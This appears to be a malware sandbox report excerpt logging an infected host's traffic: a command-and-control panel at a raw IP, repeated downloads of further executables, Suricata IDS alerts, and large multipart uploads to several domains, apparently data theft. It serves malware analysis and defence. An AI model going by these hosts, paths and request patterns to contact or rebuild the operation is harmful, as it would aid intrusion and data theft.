00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:58:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 15:09:57 GMTETag: "c60a00-62f718c9ba93b"Accept-Ranges: bytesContent-Length: 12978688Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 dc c3 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 f8 5b 00 00 d2 06 00 00 00 00 00 70 b2 06 00 00 10 00 00 00 b0 ba 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 c9 00 00 04 00 00 8d df c6 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 c2 00 10 04 00 00 00 30 c7 00 33 2b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c2 00 10 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c6 ba 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 f6 5b 00 00 10 00 00 00 f8 5b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 9f 5e 00 00 10 5c 00 00 a0 5e 00 00 fc 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 bd 07 00 00 b0 ba 00 00 a6 04 00 00 9c ba 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 10 04 00 00 00 70 c2 00 00 06 00 00 00 42 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 92 04 00 00 80 c2 00 00 94 04 00 00 48 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 20 c7 00 00 02 00 00 00 dc c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 33 2b 02 00 00 30 c7 00 00 2c 02 00 00 de c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC4
Source: global traffic	HTTP traffic detected: GET /files/5265591378/JqGBbm7.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 32 37 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10062780101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6686268934/3Mv6i65.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 38 31 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10068150101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6860984455/khykuQw.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 34 31 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10074170101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 35 38 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10075800101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7982467377/bPDDW9F.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 31 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10077160101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1085060999/d0HNrLB.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10077440101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/8164112802/JCFx2xj.exe HTTP/1.1Host: 176.113.115.7

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6

Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49792 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49984 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49985 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49988 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49990 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49991 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49992 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49993 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49994 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49998 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49996 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49997 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49999 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50000 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50003 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50006 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50011 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50012 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50014 -> 104.21.67.123:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5FSEVU5DIF1Cookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IUJU4GIRUQ38249Cookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NP6XJ8PMTFZ64ZVV71Cookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20403Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=02V2BU87HI6Q8E4UG0Cookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2296Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JI1J7C7DXPRAZS86KZ1Cookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 580385Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LMw8j4ez5S4BHK5jZUmVxlH51cldGSpZaKVDjytcx_M-1741078587-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I2AQJRW0BCWCookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C573L0PPXAR26C6XICookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15079Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: GET /socialsscesforum HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: t.me
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4WFVB97MSV05Cookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20374Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ERVMZLNE7W11WC0PCookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2291Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LAA8T6Z7T7ZTAMNZF6Cookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HMBI7GJZ82C0FX5JJ7MCookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15079Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=583I4ZOJ65OVHTTNFQFCookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20404Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CYRDGDBKEC7ECookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 595600Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O1F4VDBOGV9Cookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2249Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=isLlUHdiVxM3g2ql18nGQphE6vzZGKz5nts6jvdhlFo-1741078659-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: gadgethgfub.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RBUSXC469NKSSWX889Cookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 595615Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=eRBvJnGqdigA9Pk8t4ZNIRnwJDbQ1wKpbXU_P0J.yhA-1741078684-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: socialsscesforum.icu
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 176.113.115.7

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
